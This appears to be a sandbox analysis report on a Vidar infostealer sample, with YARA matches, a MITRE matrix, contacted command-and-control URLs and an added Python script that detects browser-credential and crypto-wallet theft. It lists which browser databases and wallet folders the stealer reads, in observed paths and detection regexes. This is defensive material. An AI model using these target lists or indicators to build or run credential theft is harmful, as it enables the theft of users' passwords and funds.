Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp | String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ElectrumLTCxtNT
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp | String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ElectronCashtxtO
Source: T6zZFfRLqs.exe | String found in binary or memory: JaxxLiberty
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\window-state.jsonw
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco01]
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?????
Source: T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystoreb
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp | String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\ExodusENT
Source: T6zZFfRLqs.exe, 00000001.00000002.398466099.000000000309E000.00000004.00000001.sdmp | String found in binary or memory: C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files\Wallets\MultiDogeENTCURRENTr
Source: T6zZFfRLqs.exe, 00000001.00000002.398485293.00000000030AD000.00000004.00000001.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?i??'
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\T6zZFfRLqs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: Yara match | File source: 00000001.00000002.397797115.00000000007E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR
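The collection behaviour in this section has three host-observable parts: a process that is not a browser opening Chrome's Login Data, Web Data, Cookies and History databases; the wallet directories under AppData\Roaming being opened; and the staging tree C:\ProgramData\<ID>\files\ (passwords.txt, information.txt, screenshot.jpg, per-browser Cookies and Autofill dumps) being written before exfiltration. The script below is an added example, not Joe Sandbox code: it correlates file events per process and only issues a verdict when more than one of those signals is present. The events are constructed Sysmon-style records (Image, TargetFilename); the paths copied from this report are combined with invented wallet file names and invented benign activity. The regexes, the browser image list and the scoring thresholds are choices of this example.

```python
"""Correlate browser-store, wallet and staging-directory file activity per process."""
import ntpath
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Processes allowed to touch their own profile databases
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "firefox.exe"}

# Chromium profile databases the report shows being opened
CHROMIUM_STORES = re.compile(
    r"\\(?:Google\\Chrome|Microsoft\\Edge|BraveSoftware\\Brave-Browser)\\User Data\\[^\\]+\\"
    r"(Login Data|Web Data|Cookies|History)$", re.I)
# Wallet locations listed in this section
WALLET_DIRS = re.compile(
    r"\\AppData\\Roaming\\(Electrum-LTC\\wallets|Exodus\\exodus\.wallet|ElectronCash\\wallets|"
    r"MultiDoge|jaxx\\Local Storage|Ethereum\\keystore)(?:\\|$)", re.I)
# Staging layout: C:\ProgramData\<long alphanumeric id>\files\<category or file>
STAGING = re.compile(r"^[a-z]:\\ProgramData\\[A-Z0-9]{16,}\\files\\(?P<item>[^\\]+)", re.I)


def profile_processes(events: Iterable[Dict[str, str]]) -> Dict[str, Dict[str, set]]:
    """Image path -> sets of store names, wallet dirs and staging items it touched."""
    per: Dict[str, Dict[str, set]] = defaultdict(
        lambda: {"stores": set(), "wallets": set(), "staging": set()})
    for ev in events:
        image, target = ev["Image"], ev["TargetFilename"]
        p = per[image]
        if ntpath.basename(image).lower() not in BROWSER_IMAGES:
            m = CHROMIUM_STORES.search(target)
            if m:
                p["stores"].add(m.group(1))
        m = WALLET_DIRS.search(target)
        if m:
            p["wallets"].add(m.group(1))
        m = STAGING.match(target)
        if m:
            p["staging"].add(m.group("item"))
    return per


def stealer_verdicts(events: Iterable[Dict[str, str]]) -> Dict[str, dict]:
    """2 points for browser stores, 2 for wallets, 3 for a populated staging tree
    (1 for a single staged file). Verdict at 4 or more, so one signal alone never fires."""
    out = {}
    for image, p in profile_processes(events).items():
        score = (2 if p["stores"] else 0) + (2 if p["wallets"] else 0)
        score += 3 if len(p["staging"]) >= 3 else (1 if p["staging"] else 0)
        if score >= 4:
            out[image] = {"score": score, "stores": sorted(p["stores"]),
                          "wallets": sorted(p["wallets"]), "staging": sorted(p["staging"])}
    return out


S = r"C:\Users\user\Desktop\T6zZFfRLqs.exe"
STAGE = r"C:\ProgramData\K2UXIBO9ATIRONJRLKW8TZMZ5\files"
EVENTS: List[Dict[str, str]] = [
    {"Image": S, "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"Image": S, "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"},
    {"Image": S, "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"Image": S, "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History"},
    {"Image": S, "TargetFilename": r"C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\default_wallet"},  # constructed name
    {"Image": S, "TargetFilename": r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco"},
    {"Image": S, "TargetFilename": STAGE + r"\passwords.txt"},
    {"Image": S, "TargetFilename": STAGE + r"\information.txt"},
    {"Image": S, "TargetFilename": STAGE + r"\screenshot.jpg"},
    {"Image": S, "TargetFilename": STAGE + r"\Cookies\Google Chrome_Default.txt"},
    # constructed benign activity: the browser reading its own database, explorer under ProgramData
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini"},
]

if __name__ == "__main__":
    for image, verdict in stealer_verdicts(EVENTS).items():
        print(image, verdict)
```

The browser-store rule alone is noisy (backup agents and password managers read Login Data legitimately), and a random-looking directory under ProgramData alone is how several installers behave; requiring the staging tree together with either credential source is what pins the verdict to this family's collection pattern. Exclude by signed publisher rather than by image name if the BROWSER_IMAGES allow-list has to survive a renamed binary.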

Remote Access Functionality:

Yara detected Vidar
Source: Yara match | File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match | File source: 1.2.T6zZFfRLqs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.T6zZFfRLqs.exe.21f0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.T6zZFfRLqs.exe.2330000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.T6zZFfRLqs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.T6zZFfRLqs.exe.2330000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.397914082.00000000021F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.361677453.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: T6zZFfRLqs.exe PID: 6576, type: MEMORYSTR

Mitre Att&ck Matrix

Numbers in parentheses are the signature counts the matrix attaches to each technique; an empty cell means no entry in that column for that row.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (1) | Application Shimming (1) | Application Shimming (1) | Disable or Modify Tools (1) | OS Credential Dumping (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (12) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API (1) | Boot or Logon Initialization Scripts | Process Injection (11) | Deobfuscate/Decode Files or Information (1) | Credentials in Registry (1) | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (3) | Exfiltration Over Bluetooth | Encrypted Channel (21) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (2) | Security Account Manager | File and Directory Discovery (4) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing (23) | NTDS | System Information Discovery (56) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (14) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | File Deletion (1) | LSA Secrets | Security Software Discovery (21) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion (1) | DCSync | Process Discovery (12) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection (11) | Proc Filesystem | System Owner/User Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                        Behavior Graph

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

Source | Detection | Scanner | Label
T6zZFfRLqs.exe | 100% | Joe Sandbox ML |

                        Dropped Files

Source | Detection | Scanner | Label
C:\ProgramData\freebl3.dll | 0% | Metadefender |
C:\ProgramData\freebl3.dll | 0% | ReversingLabs |
C:\ProgramData\mozglue.dll | 3% | Metadefender |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs |
C:\ProgramData\msvcp140.dll | 0% | Metadefender |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs |
C:\ProgramData\nss3.dll | 0% | Metadefender |
C:\ProgramData\nss3.dll | 0% | ReversingLabs |
C:\ProgramData\softokn3.dll | 0% | Metadefender |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs |
C:\ProgramData\vcruntime140.dll | 0% | Metadefender |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\mozglue[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\softokn3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\freebl3[1].dll | 0% | ReversingLabs |

                        Unpacked PE Files

Source | Detection | Scanner | Label
1.2.T6zZFfRLqs.exe.21f0e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.3.T6zZFfRLqs.exe.2330000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen

                        Domains

Source | Detection | Scanner | Label
mas.to | 0% | Virustotal |

                        URLs

Source | Detection | Scanner | Label
http://23.88.105.196/nss3.dll | 0% | Avira URL Cloud | safe
http://ocsp.thawte.com0 | 0% | URL Reputation | safe
http://www.mozilla.com0 | 0% | URL Reputation | safe
http://23.88.105.196/freebl3.dll | 0% | Avira URL Cloud | safe
https://mas.to | 0% | Avira URL Cloud | safe
http://23.88.105.196/mozglue.dll$ | 0% | Avira URL Cloud | safe
https://mas.to/users/killern0 | 0% | Avira URL Cloud | safe
http://23.88.105.196/msvcp140.dll | 0% | Avira URL Cloud | safe
https://mas.to/users/killern0/following | 0% | Avira URL Cloud | safe
http://23.88.105.196/mozglue.dll | 0% | Avira URL Cloud | safe
http://23.88.105.196/softokn3.dll | 0% | Avira URL Cloud | safe
https://mas.to/avatars/original/missing.png | 0% | Avira URL Cloud | safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe
http://23.88.105.196/vcruntime140.dll | 0% | Avira URL Cloud | safe
https://mas.to/ | 0% | Avira URL Cloud | safe
https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c | 0% | Avira URL Cloud | safe
http://23.88.105.196/ | 0% | Avira URL Cloud | safe
http://23.88.105.196/nss3.dllO | 0% | Avira URL Cloud | safe
http://23.88.105.196/1008 | 0% | Avira URL Cloud | safe
http://service.real.cop | 0% | Avira URL Cloud | safe
https://mas.to/users/killern0/followers | 0% | Avira URL Cloud | safe
https://media.mas.to | 0% | Avira URL Cloud | safe
https://mas.to/@killern0 | 0% | Avira URL Cloud | safe

                        Domains and IPs

                        Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mas.to | 88.99.75.82 | true | false | | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://23.88.105.196/nss3.dll | false | Avira URL Cloud: safe | unknown
http://23.88.105.196/freebl3.dll | false | Avira URL Cloud: safe | unknown
http://23.88.105.196/msvcp140.dll | false | Avira URL Cloud: safe | unknown
http://23.88.105.196/mozglue.dll | false | Avira URL Cloud: safe | unknown
http://23.88.105.196/softokn3.dll | false | Avira URL Cloud: safe | unknown
http://23.88.105.196/vcruntime140.dll | false | Avira URL Cloud: safe | unknown
http://23.88.105.196/ | false | Avira URL Cloud: safe | unknown
http://23.88.105.196/1008 | false | Avira URL Cloud: safe | unknown
https://mas.to/@killern0 | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | temp.1.dr | false | | high
http://www.mozilla.com/en-US/blocklist/ | mozglue[1].dll.1.dr | false | | high
https://duckduckgo.com/ac/?q= | temp.1.dr | false | | high
https://support.google.com/chrome/?p=plugin_wmp | T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | temp.1.dr | false | | high
https://support.google.com/chrome/?p=plugin | T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | false | | high
http://ocsp.thawte.com0 | nss3[1].dll.1.dr | false | URL Reputation: safe | unknown
http://www.mozilla.com0 | nss3[1].dll.1.dr | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | temp.1.dr | false | | high
https://mas.to | T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | temp.1.dr | false | | high
http://23.88.105.196/mozglue.dll$ | T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://mas.to/users/killern0 | T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/tootsuite/mastodon | T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | false | | high
https://joinmastodon.org/apps | T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | temp.1.dr | false | | high
https://support.google.com/chrome/?p=plugin_real | T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | false | | high
https://mas.to/users/killern0/following | T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://mas.to/avatars/original/missing.png | T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | nss3[1].dll.1.dr | false | | high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://mas.to/ | T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c | T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtabSQLite | temp.1.dr | false | | high
http://23.88.105.196/nss3.dllO | T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://service.real.cop | T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://forms.real.com/real/realone/download.html?type=rpsp_us | T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | temp.1.dr | false | | high
https://mas.to/users/killern0/followers | T6zZFfRLqs.exe, 00000001.00000003.369964289.000000000083E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://media.mas.to | T6zZFfRLqs.exe, 00000001.00000002.398199887.0000000002F10000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://download.divx.com/plp | T6zZFfRLqs.exe, 00000001.00000003.374090560.000000000309B000.00000004.00000001.sdmp | false | | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | temp.1.dr | false | | high

                                                            Contacted IPs

                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
88.99.75.82 | mas.to | Germany | 24940 | HETZNER-ASDE | false
23.88.105.196 | unknown | United States | 18978 | ENZUINC-US | false

                                                            Private

                                                            IP
                                                            192.168.2.1

                                                            General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 491601
Start date: 27.09.2021
Start time: 18:31:58
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 53s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: T6zZFfRLqs.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@8/18@1/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.50.102.62, 23.0.174.200, 23.0.174.185, 20.54.110.249, 40.112.88.60, 20.82.210.154, 23.10.249.43, 23.10.249.26, 95.100.54.203
• Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            No simulations

                                                            Joe Sandbox View / Context

                                                            IPs

Match | Associated Sample Name / URL | Detection | Context
88.99.75.82 | nY67wl47QZ.exe | malicious |
| OfE705GyPZ.exe | malicious |
| W7fb1ECIQA.exe | malicious |
| R9LbEnIk0s.exe | malicious |
| 7XmWGse79x.exe | malicious |
| m5W1BZQU4m.exe | malicious |
| hHsIHUGICB.exe | malicious |
| NOgYb2fHbO.exe | malicious |
| VwDvbAowp0.exe | malicious |
| lXy3MnXJ83.exe | malicious |
| SebwAujas5.exe | malicious |
| nxW9yUgdYM.exe | malicious |
| cxBR3cCGTw.exe | malicious |
| k5THcVgINl.exe | malicious |
| b2i2IopgOC.exe | malicious |
| G2BPn4a7o1.exe | malicious |
| qOsCIQD1uR.exe | malicious |
| NC7bm1PoKj.exe | malicious |
| p0FDRanFUE.exe | malicious |
| Tt5xbxWwsb.exe | malicious |

                                                                                                    Domains

Match | Associated Sample Name / URL | Detection | Context
mas.to | nY67wl47QZ.exe | malicious | 88.99.75.82
| OfE705GyPZ.exe | malicious | 88.99.75.82
| W7fb1ECIQA.exe | malicious | 88.99.75.82
| R9LbEnIk0s.exe | malicious | 88.99.75.82
| 7XmWGse79x.exe | malicious | 88.99.75.82
| m5W1BZQU4m.exe | malicious | 88.99.75.82
| hHsIHUGICB.exe | malicious | 88.99.75.82
| NOgYb2fHbO.exe | malicious | 88.99.75.82
| VwDvbAowp0.exe | malicious | 88.99.75.82
| lXy3MnXJ83.exe | malicious | 88.99.75.82
| SebwAujas5.exe | malicious | 88.99.75.82
| nxW9yUgdYM.exe | malicious | 88.99.75.82
| cxBR3cCGTw.exe | malicious | 88.99.75.82
| k5THcVgINl.exe | malicious | 88.99.75.82
| b2i2IopgOC.exe | malicious | 88.99.75.82
| G2BPn4a7o1.exe | malicious | 88.99.75.82
| qOsCIQD1uR.exe | malicious | 88.99.75.82
| NC7bm1PoKj.exe | malicious | 88.99.75.82
| p0FDRanFUE.exe | malicious | 88.99.75.82
| Tt5xbxWwsb.exe | malicious | 88.99.75.82

                                                                                                    ASN

Match | Associated Sample Name / URL | Detection | Context
HETZNER-ASDE | nY67wl47QZ.exe | malicious | 88.99.75.82
| OfE705GyPZ.exe | malicious | 88.99.75.82
| W7fb1ECIQA.exe | malicious | 88.99.75.82
| R9LbEnIk0s.exe | malicious | 88.99.75.82
| qOthJCpJ8E.exe | malicious | 135.181.211.109
| 7XmWGse79x.exe | malicious | 88.99.75.82
| m5W1BZQU4m.exe | malicious | 88.99.75.82
| hHsIHUGICB.exe | malicious | 88.99.75.82
| NOgYb2fHbO.exe | malicious | 88.99.75.82
| vKTd7I2OdfBzkW2.exe | malicious | 136.243.159.53
| VwDvbAowp0.exe | malicious | 88.99.75.82
| lXy3MnXJ83.exe | malicious | 88.99.75.82
| SebwAujas5.exe | malicious | 88.99.75.82
| nxW9yUgdYM.exe | malicious | 88.99.75.82
| Ov3tXE6rdw.exe | malicious | 168.119.93.163
| cxBR3cCGTw.exe | malicious |
                                                                                                    • 88.99.75.82
                                                                                                    Confirmation de cdeclient_5045009.xlsxGet hashmaliciousBrowse
                                                                                                    • 168.119.93.163
                                                                                                    KI7JhXnhm9.exeGet hashmaliciousBrowse
                                                                                                    • 136.243.159.53
                                                                                                    k5THcVgINl.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    b2i2IopgOC.exeGet hashmaliciousBrowse
                                                                                                    • 88.99.75.82
                                                                                                    ENZUINC-USnY67wl47QZ.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    OfE705GyPZ.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    W7fb1ECIQA.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    R9LbEnIk0s.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    7XmWGse79x.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    m5W1BZQU4m.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    hHsIHUGICB.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    NOgYb2fHbO.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    VwDvbAowp0.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    lXy3MnXJ83.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    SebwAujas5.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    nxW9yUgdYM.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    cxBR3cCGTw.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    k5THcVgINl.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    b2i2IopgOC.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    G2BPn4a7o1.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    qOsCIQD1uR.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    NC7bm1PoKj.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    p0FDRanFUE.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196
                                                                                                    Tt5xbxWwsb.exeGet hashmaliciousBrowse
                                                                                                    • 23.88.105.196

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
37f463bf4616ecd445d4a1937da06e19 | InvPixcareer.-43329_20210927.xlsb | Get hash | malicious | Browse | 88.99.75.82
37f463bf4616ecd445d4a1937da06e19 | nY67wl47QZ.exe | Get hash | malicious | Browse | 88.99.75.82
37f463bf4616ecd445d4a1937da06e19 | OfE705GyPZ.exe | Get hash | malicious | Browse | 88.99.75.82
37f463bf4616ecd445d4a1937da06e19 | W7fb1ECIQA.exe | Get hash | malicious | Browse | 88.99.75.82
